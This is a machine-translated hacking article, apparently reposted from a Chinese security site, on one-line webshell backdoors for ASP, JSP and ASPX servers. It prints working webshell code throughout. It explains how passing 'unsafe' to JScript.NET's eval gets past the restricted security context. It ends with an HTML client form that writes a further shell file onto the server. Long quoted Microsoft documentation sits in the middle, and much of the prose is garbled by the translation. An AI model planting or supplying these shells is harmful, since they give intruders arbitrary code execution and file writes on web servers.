ASPX a word of the script the horse detailed analysis-vulnerability warning-the black bar safety net

2009-06-01T00:00:00
ID MYHACK58:62200923420
Type myhack58
Reporter 佚名
Modified 2009-06-01T00:00:00

Description

Source: evil octal

First recall before the ASP Word of the classic Trojan! <%if request("nonamed")<>"" then execute request("nonamed")%> VBS execute is dynamic running the specified code and JSCRIPT also have the eval function can be achieved,that is ASP word the Trojan also has a version is the use of JSCRIPT's eval! The Internet also has examples I will not say more!..... And then parse the language eventually developed into intermediate code such as java . net dynamic execution does not exist! Prior to the ASP being often the only support VBS JSCRIPT(like python, perlscript these exceptions, I will not say)... Today ASPX in the support of VBS advanced version of VB does not exist execute this unique method.... Really sorry.... While Jscript 也 一样 转向 高级 版本 Jscript.net but we need the eval function or survive! script child had the privilege of... First buried next foreshadowing. the first talk about today's intermediate language the WEB application in a word JSP :<% if(request. getParameter("f")!= null)(new java. io. FileOutputStream(application. getRealPath("\\")+request. getParameter("f"))). write(request. getParameter("t"). getBytes()); %> this is my own writing going to play to say,is everyone huh! I do not speak..... ASPX:<%@ Page Language="C#" validateRequest="false" %><%System. IO. StreamWriter ow=new System. IO. StreamWriter(Server. MapPath("images. aspx"),false);ow. Write(Request. Params["l"]);ow. Close()%>this don't know is who works,the feeling of nature is a bit like my JSP word! But still put a simple shell! Support ing.... The two words generally are the same as the calling class received are written to the file! It simply is the file write operation only!~ Former ASP Word of Glory now in the intermediate language of the back door to the limit was gone~~wrong!...... ASPX C/S Trojan like us can achieve! Because there is Jscript. net presence! Said above to the eval function but also survival!~ OK we start to achieve <%@ Page Language="Jscript"%><%Response. Write(eval(Request. Item["nonamed"]));%> Like this? Grace is! Can take to try to save as text. aspx, and then submit <http://127.0.0.1/text.aspx?nonamed=var%20mydate%20=%20new%20Date>(); Print out the current time...Sat Aug 4 2 0:0 5:2 0 UTC+8 2 0 0 7 Looks like OK! Oh we try again <http://127.0.0.1/text.aspx?nonamed=Server.MapPath>("."); The report found that the error!.... (I'm just as stuck in here,so toss a few months,or this article earlier baked! Here thank about it because の Warlock qq:4 6 5 9 6 7 5 everyone is welcome to come to him to learn ...ha) The cause of the error { Security exception Description: The application attempted to perform security policy does not allow the operation. To grant this application the required permission, contact your system administrator or in the configuration file to change the application's trust level. Exception details: System. Security. SecurityException: request failed. } Why is it so? OK we found the MS document To below to see <http://msdn.microsoft.com/librar> ... /jsmscStartPage. asp JScript . NET JScript . NET's new features JScript . NET is the next generation of the Microsoft JScript language, it is using Web languages to quickly and easily access the Microsoft . NET platform method. JScript is the main role of the use of ASP.NET construct Web sites and use . NET Framework script a custom application. JScript . NET with the ECMAScript standard compliant, but it also has ECMAScript does not specify other features, such as true compiled code, by complying with the“Common Language Specification”(CLS) and the realization of cross-language support, as well as on . NET Framework access. Visual Studio . NET 2 0 0 2 in JScript . NET version full use . NET Framework itself has security, and JScript . NET 2 0 0 3 for the eval method of adding a restricted security context, thereby further enhancing security. In JScript . NET of several new features designed to take full advantage of the CLS, which is used to standardize data types, objects, public ways, objects, interoperability mode, etc. content of a set of rules. Any CLS-compliant language can be used in JScript . NET created classes, objects and components. As a JScript developer, you can from other CLS-compliant programming language to access classes, components and objects, without considering language-specific differences such as data types. JScript . NET program using some of the CLS features including namespaces, properties, reference parameters, and native arrays. The following is JScript . NET some of the new features: JScript . NET 2 0 0 3 new features the eval method of the restricted security context Now, in order to enhance security, regardless of the permissions of the caller is what the built-in eval method are by default in the restricted security context of the running script. The call to eval, if the“unsafe”as the optional second parameter will cause the script to use the caller's permissions to run, which would allow access to the file system, network, or user interface. For more information, see the eval method. JScript . NET 2 0 0 2 new features Class-based objects JScript . NET like JScript, as through a prototype-based objects support inheritance. JScript . NET also allows statements to define the object data and behavior of the class, thus supporting class-based object. In JScript . NET created in the class by any . NET language use and extension. A class can inherit the base class's properties and methods. Can the classes and class members applied to several attributes, modify their behavior and visibility. For more information, see class-based objects. JScript data types In JScript . NET like JScript, you can write a program without designating the variable's data type. JScript . NET can also be used as a strongly typed language where all variables are bound to a specific data type, or you also can use a mixture of typed and untyped variables. JScript . NET provides many new data types. Can also be class and the . NET type as a data type. For more information, see the JScript data types. Conditional compilation The instruction can control JScript . NET program is compiled. For example, the@debug Directive may be the script of a specific part of the turn on or off debugging information. For more information, see the @debug Directive.@ position instruction to the debugger to set the current line number. For more information, see the @position Directive. If you are writing will be merged into the other script in the code, then these two instructions are useful. For more information, see conditional compilation. The JScript namespace Namespace by the classes, interfaces and methods of the organization of the hierarchical structure to prevent naming conflicts. In JScript . NET you can define your own namespace. You can also use JScript . NET access to any . NET Framework namespaces, including their own definition of those namespaces. The package statement allows a package of related classes to achieve easy deployment and to avoid naming conflicts. For more information, see the package statement. The import statement makes . NET Framework namespaces can be used in a script, so the script can access the namespace of the class and the interface. For more information, see the import statement. JScript variables and constants JScript . NET introduces a Const statement is used to define the representation of the constant value of the identifier. For more information, see JScript variables and constants. Enumeration JScript . NET introduces the Enum statement that allows the construction of an enumeration data type. The use of enumeration for the data type of the value specified for the name. For more information, see enum statement. Then to find the eval method <http://msdn.microsoft.com/librar> ... /h tml/jsmtheval. asp JScript . NET the eval method Calculate the JScript code and executes it. function eval(codeString : String [, override : String]) Parameters codeString Required. Contains valid JScript code string. override Optional. To be applied to determine codeString, code security permissions string. Note the eval function allows dynamic execution of JScript source code. Passed to the eval method in the code execution where the context and the call to evalMethod the context the same. Please note that in the eval statement defines a new variable or a type for a closed program is not visible. Unless the string“unsafe”is passed as the second parameter, otherwise pass to the eval method code in the restricted security context of the execution. Restricted security context of the prohibition of access to system resources, such as file system, network, or user interface. If code attempts to access these resources, it will produce a security exception. When the eval of the second argument is the string“unsafe”is passed to the eval method, the code in the calling code is located in the security context of the execution. The second parameter is case-sensitive, therefore the string“Unsafe”or“UnSAfE”will not rewrite a restricted security context. The safety instructions in the unsafe mode, the eval can only be used for the execution from the trusted source to get the code string. The original eval to limit the security to Oh that we will do as he says to do to join the unsafe parameters to achieve <%@ Page Language="Jscript"%><%Response. Write(eval(Request. Item["z"],"unsafe"));%> OK Submit<http://127.0.0.1/test.aspx?z=Server.MapPath>(".") Print out F:\nonamed\DOTNETPROJECT is my current WEB directory a success! Hot tears ing~~~ that is, you submit what up he's running and what recovery year ASP the back door effect!~ -_- Response. Write can do not! But I in order to echo it plus go :) OK the following we construct a word to the client! <! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <TITLE> ASPX one line Code Client</TITLE> </HEAD> <BODY> <form action=http://127.0.0.1/test. aspx method=post> <textarea name=z cols=1 2 0 rows=1 0 width=4 5> var nonamed=new System. IO. StreamWriter(Server. MapPath("nonamed. aspx"),false); nonamed. Write(Request. Item["l"]); nonamed. Close(); </textarea> <textarea name=l cols=1 2 0 rows=1 0 width=4 5>your code</textarea><BR><center><br> <input type=submit value=submit> </BODY> </HTML>